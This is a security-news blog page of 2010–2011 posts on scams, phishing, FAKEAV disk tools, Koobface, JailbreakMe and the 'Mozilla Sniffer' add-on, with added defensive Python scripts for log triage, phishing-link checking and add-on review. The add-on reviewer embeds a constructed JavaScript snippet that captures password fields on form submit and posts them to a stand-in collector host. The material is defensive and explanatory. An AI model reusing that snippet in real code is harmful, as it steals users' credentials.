Fake Facebook Users Spreading Scam Messages

February 3, 2011 by  
Filed under Security News


I just saw a new kind of scam spreading on Facebook as messages with the same content as the usual email scams about claiming prizes or money. The account that sends the scam doesn’t have any personal information or friends; it just uses the Facebook logo as its profile picture to look like the Facebook team. (Watch Out and Take Care)



Warning: A New and Danger PayPal Phishing Scam Email

February 2, 2011 by  
Filed under Security News


I just received a PayPal email that said “Please Update Your Account”. It’s not from PayPal, it’s fake, but the problem is that it duplicates the PayPal site frighteningly well: even when you open the link it includes, you will not suspect it’s fake, so see the video to know what I’m talking about.



Fake System Tools Spread to Japan

January 27, 2011 by  
Filed under Security News

Late last year, we talked about how fake system diagnostic tools were becoming the next step in the evolution of FAKEAV malware. These variants started to affect Japanese users as well.


Fake system diagnostic tools such as this variant named System Defragmenter were first discovered in October 2010. These tools very frequently change their names. At present, we are aware of at least 30 different names/aliases that these tools use. Cybercriminals may believe that changing their products’ names makes detecting and removing these much more difficult.


None of this should be taken to mean that conventional fake antivirus attacks have gone away, however. Last week, a very high-profile attack involving a rogue antivirus detected by Trend Micro as TROJ_FAKEAV.SMTV hit Twitter. Many users fell prey to this when they clicked links that used the goo.gl URL shortener to lead to this FAKEAV variant’s download.


Attacks involving fake diagnostic tools are similar to traditional FAKEAV attacks. A fake tool appears to function like a real system diagnosis tool, though its supposed diagnostic functions never work. Once a user’s PC is infected by such a tool, it repeatedly displays fake warnings saying that the system is suffering from hard disk problems.


Inexperienced users may worry and panic over these problems. They may end up paying for additional “tools” and giving cybercriminals their personal information such as email addresses and credit card numbers. Like FAKEAV, these fake diagnosis tools will cause many problems for users.


Infection Vectors

Fake diagnostic tools may arrive via several different infection vectors:

  • Users visit malicious sites and manually download and install malicious files.
  • Users visit malicious sites that are riddled with exploits, which silently install malicious files in the background.


The tactics cybercriminals use to distribute fake diagnostic tools are broadly similar to those used for FAKEAV malware. Cybercriminals may lead users either to their own sites, through Black Hat Search Engine Optimization (SEO) poisoning, or to compromised legitimate sites. When the fake tools are installed without the users’ knowledge, users may think the fake tools are actually legitimate programs, allowing the attacks to succeed.


System Defragmenter is detected as TROJ_FAKEAL.GG. While the sites that distribute it are now inaccessible, similar attacks continue to be launched, albeit using constantly changing names and sites. Understanding how these attacks are conducted will help users avoid becoming their victims.


Its installer uses the same icon as Windows Update.

Fourteen minutes after the tool is installed, it displays a fake alert in the user’s notification area.



Here are some of the other names the fake diagnostic tools use:

  • Check Disk
  • Defragmenter
  • Disk Doctor
  • Disk Optimizer
  • Disk Repair
  • DiskOK
  • EasyScan
  • FastDisk
  • GoodMemory
  • Hard Drive Diagnostic
  • HDDControl
  • HDDDefragmenter
  • HDDDiagnostic
  • HDDFix
  • HDDHelp
  • HDDPlus
  • HDDLow
  • HDDRecovery
  • HDDRepair
  • HDDRescue
  • HDDTools
  • MemoryFixer
  • MyDisk
  • QuickDefrag
  • Scan Disk
  • Scanner
  • Smart HDD
  • Support Tool 2011
  • System Degragmenter
  • Ultra Defragger
  • Win Defrag
  • Win Defragmenter
  • Win Scanner


Solutions and Workarounds

Trend Micro free tools can clean systems that have been affected by System Defragmenter. However, users first have to work around one of this malware’s behaviors: it monitors the execution of applications, so that some security tools such as HijackThis, as well as files in the C:\Windows and C:\Program Files folders, will not run and instead display the following message:

[Screenshot omitted: the message shown when a blocked application is launched]


Users will have to terminate the malware process first. The procedure starts by determining the file name the malware uses. To do this, follow these steps:

  1. Right-click the shortcut (System Defragmenter) on the desktop and select Properties.
  2. Check and note the file name, which is usually made up of random characters. In the following screenshot, the file name used was 1181500.exe.

[Screenshot omitted: the shortcut’s Properties dialog showing the file name 1181500.exe]
After taking note of the file name, open Task Manager by pressing Ctrl+Alt+Delete and use it to terminate the fake tool’s process.


Using HijackThis, take note of any or all of the registry entries that the malware added. HijackThis can then remove these entries to stop the malware from running whenever the system starts. (The suspicious entries have been enclosed in a red box.)


[Screenshot omitted: HijackThis scan results with the malware’s registry entries enclosed in a red box]
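The procedure above boils down to three checks a responder makes by eye: does the startup entry's display name match one of the known fake-tool aliases, is the executable name a run of random characters like 1181500.exe, and does it auto-start from a user profile folder rather than a program directory. The following script is an added example, not code from the Trend Micro post or from HijackThis; it applies those checks to HijackThis-style O4 (registry Run) log lines. The log lines are constructed for the example, the alias list is the one given in the post, and the profile-folder list is an assumption.

```python
import re
from pathlib import PureWindowsPath

# Aliases listed in the post for the fake "system diagnostic" tools.
FAKE_TOOL_ALIASES = {
    "check disk", "defragmenter", "disk doctor", "disk optimizer", "disk repair",
    "diskok", "easyscan", "fastdisk", "goodmemory", "hard drive diagnostic",
    "hddcontrol", "hdddefragmenter", "hdddiagnostic", "hddfix", "hddhelp",
    "hddplus", "hddlow", "hddrecovery", "hddrepair", "hddrescue", "hddtools",
    "memoryfixer", "mydisk", "quickdefrag", "scan disk", "scanner", "smart hdd",
    "support tool 2011", "system defragmenter", "system degragmenter",
    "ultra defragger", "win defrag", "win defragmenter", "win scanner",
}

# Folders from which a legitimate disk tool would not normally auto-start (assumption).
PROFILE_DATA_FOLDERS = {"temp", "application data", "appdata", "local settings"}

# HijackThis O4 line layout: "O4 - HKCU\..\Run: [Display name] C:\path\file.exe args"
O4_RE = re.compile(
    r"^O4 - (?P<hive>HK\w+)\\\.\.\\(?P<key>\w+): \[(?P<name>[^\]]*)\] (?P<cmd>.+)$"
)


def triage_o4_line(line):
    """Return a triage record for one O4 line, or None if the line is not an O4 entry."""
    m = O4_RE.match(line.strip())
    if not m:
        return None
    cmd = m.group("cmd")
    # Keep the executable path only (everything up to the first ".exe").
    exe_match = re.match(r"(.+?\.exe)", cmd, re.IGNORECASE)
    exe = PureWindowsPath(exe_match.group(1) if exe_match else cmd)
    parts = {p.lower() for p in exe.parts}

    reasons = []
    if m.group("name").strip().lower() in FAKE_TOOL_ALIASES:
        reasons.append("display name matches a known fake-tool alias")
    if re.fullmatch(r"\d{5,}", exe.stem):
        reasons.append("executable name is a run of digits (the 1181500.exe pattern)")
    if parts & PROFILE_DATA_FOLDERS:
        reasons.append("auto-starts from a user profile data folder")

    return {
        "hive": m.group("hive"), "key": m.group("key"), "name": m.group("name"),
        "exe": str(exe), "suspicious": bool(reasons), "reasons": reasons,
    }


def triage_log(text):
    """Triage every O4 entry in a HijackThis log; other line types are ignored."""
    records = (triage_o4_line(line) for line in text.splitlines())
    return [r for r in records if r is not None]


# Constructed sample log (not real HijackThis output); the second entry mirrors
# the System Defragmenter case from the post.
SAMPLE_LOG = """\
Logfile of Trend Micro HijackThis (constructed sample)
O4 - HKLM\\..\\Run: [SoundMAX] C:\\Program Files\\Analog Devices\\Core\\smax4pnp.exe
O4 - HKCU\\..\\Run: [System Defragmenter] C:\\Documents and Settings\\user\\Local Settings\\Application Data\\1181500.exe
O4 - HKCU\\..\\Run: [ctfmon.exe] C:\\WINDOWS\\system32\\ctfmon.exe
"""

if __name__ == "__main__":
    for rec in triage_log(SAMPLE_LOG):
        flag = "SUSPICIOUS" if rec["suspicious"] else "ok"
        print(f"{flag:10} {rec['hive']}\\{rec['key']} [{rec['name']}] -> {rec['exe']}")
        for reason in rec["reasons"]:
            print(f"           - {reason}")
```

Each reason is reported separately so the responder can see why an entry was flagged; an entry that trips all three checks, as the constructed System Defragmenter line does, is the one to terminate in Task Manager and remove from the Run key.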



Source: http://blog.trendmicro.com

Older Versions of the Yahoo! Toolbar may cause Internet Explorer to stop responding or unexpectedly close

December 24, 2010 by  
Filed under Security News


The third-party products that this article discusses are manufactured by companies that are independent of Microsoft.


Microsoft makes no warranty, implied or otherwise, about the performance or reliability of these products.



When you use Internet Explorer, you may receive one of the following error messages:

  • Internet Explorer has stopped working
  • Internet Explorer encountered a problem and needs to close



As a result of some changes made by Yahoo!, older versions of the Yahoo! toolbar can cause Internet Explorer to stop responding or unexpectedly close.



To resolve this issue, Yahoo! and Microsoft recommend that you uninstall and reinstall the toolbar as follows:


Please have a pen and paper handy to write down the following information for your version of Windows and then perform those steps to resolve the issue on your computer:


For Windows XP

  1. Click Start, and then click Control Panel.
  2. Double-click  Add or Remove Programs.
  3. Scroll to and click Yahoo! Toolbar to select it, and then click Remove.
  4. Follow any confirmation prompts.
  5. Close Add or Remove Programs and then restart Internet Explorer to verify that the issue is resolved.
  6. To re-install the Yahoo! Toolbar to the latest version, please visit http://us.toolbar.yahoo.com/ and follow the steps on the website.


For Windows 7 and Windows Vista

  1. Click Start, and then click Control Panel.
  2. Under Programs, click Uninstall a program.
  3. Scroll to and click Yahoo! Toolbar to select it, and then click Uninstall from the options above.
  4. Click Yes on the uninstall warning pop-up window.
  5. Close Uninstall a program and then restart Internet Explorer to verify that the issue is resolved.
  6. To re-install the Yahoo! Toolbar to the latest version, please visit http://us.toolbar.yahoo.com/ and follow the steps on the website.




    Cross-platform worm targets Facebook users

    October 29, 2010 by  
    Filed under Security News

    A new member of the Koobface family of malware has been making the headlines in the last 24 hours. The reason why the threat, which is sometimes being referred to as “Boonana”, has been getting so much attention is that it doesn’t just infect Windows, but targets Mac OS X and Linux computers too.


    This incarnation of the Koobface worm appears to have been spread via Facebook in messages asking “is this you in this video”.


    IMPORTANT! PLEASE READ. Hi <username>. Is this you in this video here : <link>


    Clicking on the link takes you to an external website that displays an image of a woman (grabbed from the Hot Or Not website).


    [Image omitted: the picture of a woman shown on the lure page]


    Visitors to the webpage who want to see more are prompted to give permission for an applet called JPhotoAlbum.class to be run from inside a Java Archive (JAR) called JNANA.TSA.


    [Image omitted: the Java security warning asking permission to run the applet]


    Whether you are running Windows, Mac OS X or Linux on your computer, if you give permission for the highly obfuscated Java app to run then the malware will sneakily download a variety of programs from the internet which it will then execute on your computer.


    Files which can be downloaded include:



    Sophos detects various components of the attack as Troj/KoobStrt-A, Troj/KoobInst-A, Troj/KoobCls-A, Troj/Agent-PDY, Troj/DwnLdr-IOX, and Troj/DwnLdr-IOY. In addition, Sophos’s web protection blocks access to the malicious webpages.


    Don’t forget to always be careful about what links you click on, even if they appear to have been shared by someone you know on Facebook.


    And if you’re a user of Linux or Mac OS X, don’t think that the malware problem only exists on Windows. Malicious hackers are becoming increasingly interested in targeting other platforms, and if users of your operating system have a reputation for being dismissive of malware warnings on your preferred OS, the bad guys may consider you a soft target.


    By Graham Cluley @ nakedsecurity.sophos.com




    Adobe races to patch zero-day vulnerability in Flash Player

    September 26, 2010 by  
    Filed under Security News

    Adobe has issued a security advisory about an as-yet unpatched vulnerability in its popular Flash Player software, affecting users of Windows, Mac, Linux, Solaris and even Google Android.


    The critical security hole could allow an attacker to take control of your computer and run malicious code.


    The firm also confirmed that the vulnerability affects Adobe Reader 9.3.4 for Windows, Mac and UNIX, and Adobe Acrobat 9.3.4 and earlier versions for Windows and Mac. Acrobat and Reader are affected because the programs support Flash content inside PDF files.


    The new warnings follow closely after news last week of another vulnerability in Reader and Acrobat that was being exploited by malware authors.


    Adobe has announced that an update for Flash Player tackling the latest vulnerability is expected to be available during the week of September 27, and an update for Acrobat and Reader will be available the following week.


    Last month, Sophos blogger Chet Wisniewski interviewed Brad Arkin, Adobe’s Senior Director of Product Security and Privacy, about the firm’s security strategy and their upcoming sandboxing technology.


    You can also download the interview directly in MP3 format.





    GFI Labs Issues Labor Day Phishing Warning

    September 3, 2010 by  
    Filed under Security News

    Online holiday retail sales traditionally serve as a prime platform for attacks

    GFI Software security researchers issued a warning today regarding an expected increase in phishing attacks in relation to the upcoming Labor Day holiday. GFI Labs, the dedicated malware research center of GFI Software, warns that consumers are traditionally at high risk for targeted phishing attacks due to the preponderance of online retail sales events over the holiday weekend.


    Amidst the flurry of emails promoting holiday sales are fraudulent messages that include bogus links to sites that download malicious software or phishing sites soliciting personal information. While research from companies like IBM has suggested that phishing attacks were on the decline last year, GFI Labs warns that customers should not be lulled into a false sense of security. According to phishing tracker Phishtank.com, there are over 2,900 active phishing web sites currently verified on the internet. Furthermore, the popularity of social media sites such as Facebook and Twitter has made them attractive platforms for holiday-themed attacks.


    According to GFI Software, one of the world’s leading providers of security software, consumers can reduce their risk of infection by following three simple rules:


    1) Ensure that your computer is protected against the newest malware threats by installing a combined antivirus and antispyware solution. This serves as the first point of protection against dangerous viruses and Trojans – and one without the other is no longer effective.

    2) Never click on a link from an email to make a credit card purchase. The email you’ve received may look legitimate, but there’s a high probability that the link will take you to a spoofed site where your credit card information will be recorded by cyber criminals. Instead, navigate to the retailer’s Web site directly through your browser. Again, the email may look harmless, but it’s better to be safe than sorry.

    3) Even when visiting a trusted Web site, be vigilant about anything that looks out of the ordinary. Social networking sites like Facebook, Twitter and MySpace have all served as points of infection recently. Do not download anything, even from a trusted site, unless you are 100% sure of its contents.
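Rule 2 above, and the PayPal “Please Update Your Account” email earlier on this page, both rest on the same fact: the link text in a phishing mail looks legitimate while the href points somewhere else. The script below is an added example, not code from GFI or from the original posts; it parses an HTML mail body, extracts every link, and reports the classic indicators a mail gateway or a cautious user would check: visible text naming one domain while the href goes to another, a trusted brand name embedded inside an unrelated host, a bare IP address as the host, and plain http. The brand list, the message body and all hosts in it are constructed for the example.

```python
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit


class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> in an HTML mail body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def registered_domain(host):
    """Last two labels of a host name. Deliberate simplification: production code
    should consult the Public Suffix List so that e.g. shop.co.uk is handled."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


DOMAIN_IN_TEXT = re.compile(r"(?:https?://)?([a-z0-9.-]+\.[a-z]{2,})")


def assess_link(href, text, brand_domains):
    """Return the list of phishing indicators found for one link (empty = nothing found)."""
    parts = urlsplit(href)
    host = (parts.hostname or "").lower()
    findings = []

    try:  # a bare IP literal is rare for a legitimate retailer or bank
        ipaddress.ip_address(host)
        findings.append("link host is a bare IP address")
    except ValueError:
        pass

    # Visible text shows one domain while the href goes somewhere else.
    m = DOMAIN_IN_TEXT.search(text.lower())
    if m and registered_domain(m.group(1)) != registered_domain(host):
        findings.append(f"visible text shows {m.group(1)} but the link goes to {host}")

    # A trusted brand name embedded in a host that is not actually that brand's domain.
    for brand in brand_domains:
        if brand in host and registered_domain(host) != brand:
            findings.append(f"'{brand}' appears inside an unrelated host {host}")

    if parts.scheme == "http":
        findings.append("link uses plain http")
    return findings


def scan_email(html, brand_domains):
    """Return [(href, text, findings)] for every link in the message."""
    collector = LinkCollector()
    collector.feed(html)
    return [(href, text, assess_link(href, text, brand_domains)) for href, text in collector.links]


# Constructed brand list and message body for the example (not a real email).
BRAND_DOMAINS = ("paypal.com", "example-retailer.com")
SAMPLE_EMAIL_HTML = """
<html><body>
<p>Please Update Your Account:
   <a href="http://paypal.com.account-verify.example/update">https://www.paypal.com/</a></p>
<p>Labor Day sale: <a href="https://www.example-retailer.com/sale">Shop now</a></p>
<p>Or log in at <a href="http://203.0.113.7/login">our secure site</a></p>
</body></html>
"""

if __name__ == "__main__":
    for href, text, findings in scan_email(SAMPLE_EMAIL_HTML, BRAND_DOMAINS):
        verdict = "SUSPICIOUS" if findings else "ok"
        print(f"{verdict:10} [{text}] -> {href}")
        for finding in findings:
            print(f"           - {finding}")
```

The first constructed link trips three indicators at once (mismatched visible domain, the brand name buried in a foreign host, plain http), which is exactly the shape of the PayPal mail described above; the retailer link passes cleanly, which is why the advice to type the retailer's address yourself still holds: the checker only narrows the field, it does not prove a link is safe.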


    “Every Labor Day, we see a wave of phishing attacks taking advantage of consumers’ expectations of increased retail email promotions connected with the holiday,” said Tom Kelchner, research center manager, GFI Labs. “Cyber criminals see an opportunity to slip by unnoticed among the legitimate promotions. Along with making sure virus updates and security software patches are current, consumers need to stay vigilant and use common sense in order to avoid any unnecessary headaches that these fraudulent emails look to deliver over the long weekend.”


    About GFI
    GFI Software provides web and mail security, archiving and fax, networking and security software and hosted IT solutions for small to medium-sized enterprises (SME) via an extensive global partner community. GFI products are available either as on-premise solutions, in the cloud or as a hybrid of both delivery models. With award-winning technology, a competitive pricing strategy, and a strong focus on the unique requirements of SMEs, GFI satisfies the IT needs of organizations on a global scale. The company has offices in the United States (North Carolina, California and Florida), UK (London and Dundee), Austria, Australia, Malta, Hong Kong, Philippines and Romania, which together support hundreds of thousands of installations worldwide. GFI is a channel-focused company with thousands of partners throughout the world and is also a Microsoft Gold Certified Partner.



    JailbreakMe: Apple issues emergency iPhone/iPad security patch

    August 12, 2010 by  
    Filed under Security News

    Apple has kept true to its promise, and released a security patch for users of iPhones, iPads and the iPod Touch, closing the door on a vulnerability that could have exposed them to malware and other malicious attacks.


    The vulnerability first came to the public’s attention after it was used by a website, JailbreakMe.com, which made it simple for iPhone and iPad users to jailbreak their devices.


    As I reported earlier this month, the drive-by jailbreak exploited a vulnerability in the way that the mobile edition of Safari (the default browser used in the iOS operating system) handles PDF files – specifically its handling of fonts. Therefore, just visiting the JailbreakMe website could run code on the visitor’s iPhone, iPod Touch or iPad.


    Such a vulnerability, if left unpatched, leaves open opportunities for hackers to spread malicious code to Apple’s mobile products.


    iOS 4.0.2 for iPhone


    The iOS 4.0.2 update for iPhone and iPod Touch can be downloaded and installed using iTunes, with further information available in Apple’s support advisory HT4291.


    The same process can be used to update Apple iPads to version 3.2.3 of iOS, with detailed information about the vulnerability published on Apple’s support knowledgebase.





    JailbreakMe: Security warning for iPhone and iPad owners

    August 5, 2010 by  
    Filed under Security News

    A website that has made it simple for iPhone and iPad users to jailbreak their devices may not just be a headache for Apple, but also a portent for future malicious attacks.


    Owners of Apple gadgets who visit the JailbreakMe website in Safari have found that all they need to do to jailbreak their device is to slide a button to give permission, opening up the possibility of installing apps that have not been approved by the official AppStore.


    Previously, jailbreaking has required users to connect their device to a computer before they can start to tamper with the set-up of their iPhone or iPad and gain access to the Cydia underground app store.




    The drive-by jailbreak is possible because the website exploits a vulnerability in the way that the mobile edition of Safari (the default browser used in the iOS operating system) handles PDF files – specifically its handling of fonts.


    As a number of YouTube videos have demonstrated, it’s a pretty slick process:


    What concerns me, and others in the security community, however, is that if simply visiting a website with your iPhone can cause it to be jailbroken – just imagine what else hackers could do by exploiting this vulnerability. Cybercriminals would be able to create booby-trapped webpages that could – if visited by an unsuspecting iPhone, iPod Touch or iPad owner – run code on visiting devices without the user’s permission.





    Mozilla pulls password-sniffing Firefox add-on

    July 15, 2010 by  
    Filed under Security News

    Mozilla has issued a warning that a Firefox add-on available from the official Mozilla Add-Ons website was secretly sending users’ stolen passwords to a remote location.


    “Mozilla Sniffer” was uploaded to the Firefox add-on site on June 6th, but was only determined at the start of this week to contain code that sent the contents of website login forms to a remote location.


    In other words, if you installed this add-on (and according to Mozilla about 1800 people did) then every time you entered your password on a website you were potentially handing over your confidential login details to an unknown party.


    And this isn’t the first time that Firefox add-ons have made the security headlines. For instance, earlier this year Mozilla revealed that the Master Filer add-on was infected by the LdPinch password-stealing Trojan.


    Back then Mozilla said it would strengthen its vetting procedures, scanning all add-ons with additional anti-virus tools. Clearly that wasn’t enough in this latest breach, and there is a proposal to introduce a requirement that all add-ons be code-reviewed before they are published on the site. More details on this proposal are available in a document about the new review model.


    Mozilla has now block-listed the “Mozilla Sniffer” add-on, meaning that users who are already running the code will be prompted to remove it.


    If you’re one of the potential victims, however, I would go further than just removing the add-on. Make sure you change your passwords too.
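The proposal mentioned above, code review of every add-on before publication, needs something a reviewer can run before reading line by line. The script below is an added example, not Mozilla's review tooling or anything from the Sophos post; it is a first-pass static triage over an add-on's JavaScript that looks for the combination the post describes: code that reads password fields or hooks form submission, and also sends data to a host outside an allowlist. The allowlist, the three add-on sources and the hosts they reference are all constructed for the example. Regex heuristics like these produce false positives and can be evaded by obfuscation (the post notes the Koobface applet was "highly obfuscated"), so the output is a prioritisation aid for the human reviewer, not a verdict.

```python
import re

# Constructed allowlist of hosts an add-on may legitimately contact (assumption for the example).
ALLOWED_HOSTS = {"mozilla.org", "addons.mozilla.org"}

# Heuristic patterns: reading credentials, hooking form submission, sending data out, remote URLs.
PASSWORD_ACCESS = re.compile(r"""type\s*=\s*['"]password['"]|\[type=password\]|\.password\b""", re.I)
FORM_HOOK = re.compile(r"""addEventListener\(\s*['"]submit['"]|\bonsubmit\b""", re.I)
NETWORK_SEND = re.compile(r"XMLHttpRequest|\bfetch\(|sendBeacon|\.send\(", re.I)
URL_LITERAL = re.compile(r"https?://([a-z0-9.-]+)", re.I)


def external_hosts(source, allowed_hosts):
    """Hosts named in URL literals that are neither on the allowlist nor a subdomain of it."""
    hosts = {h.lower().rstrip(".") for h in URL_LITERAL.findall(source)}
    return sorted(h for h in hosts
                  if not any(h == a or h.endswith("." + a) for a in allowed_hosts))


def review_addon_source(name, source, allowed_hosts=ALLOWED_HOSTS):
    """Triage one add-on's JavaScript; returns severity plus the reasons behind it."""
    reads_password = bool(PASSWORD_ACCESS.search(source))
    hooks_submit = bool(FORM_HOOK.search(source))
    sends = bool(NETWORK_SEND.search(source))
    foreign = external_hosts(source, allowed_hosts)

    findings = []
    if reads_password and sends:
        findings.append("reads password fields and also performs network requests")
    if hooks_submit and sends and foreign:
        findings.append("hooks form submission and sends data to: " + ", ".join(foreign))
    if foreign and not findings:
        findings.append("contacts host(s) outside the allowlist: " + ", ".join(foreign))

    if reads_password and sends and foreign:
        severity = "high"      # the Mozilla Sniffer shape: credentials + outbound to a foreign host
    elif findings and (reads_password or hooks_submit):
        severity = "medium"
    elif findings:
        severity = "low"       # talks to an unknown host but touches no credentials
    else:
        severity = "none"
    return {"addon": name, "severity": severity, "findings": findings, "external_hosts": foreign}


# Constructed add-on sources for the example (none of these is a real add-on).
SNIFFER_LIKE_SOURCE = """
document.addEventListener("submit", function (e) {
  var fields = e.target.querySelectorAll("input[type=password], input[type=text]");
  var data = [];
  for (var i = 0; i < fields.length; i++) data.push(fields[i].name + "=" + fields[i].value);
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "http://collector.sniffer-demo.example/log");
  xhr.send(data.join("&"));
});
"""

BENIGN_SOURCE = """
// Adjusts page font; never touches forms or the network.
document.addEventListener("DOMContentLoaded", function () {
  document.body.style.fontFamily = "sans-serif";
});
"""

FEED_SOURCE = """
// Fetches a public feed; network use but no credential access.
fetch("https://feeds.example/latest.json").then(function (r) { return r.json(); });
"""

if __name__ == "__main__":
    for name, src in [("constructed-sniffer", SNIFFER_LIKE_SOURCE),
                      ("constructed-benign", BENIGN_SOURCE),
                      ("constructed-feed", FEED_SOURCE)]:
        result = review_addon_source(name, src)
        print(f"{result['severity']:7} {name}")
        for finding in result["findings"]:
            print(f"        - {finding}")
```

Severity is driven by the conjunction, not by any single pattern: plenty of honest add-ons contact a remote API, and a password-manager add-on legitimately reads password fields, so only the combination of credential access, an outbound channel and a host the reviewer does not recognise is ranked high.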




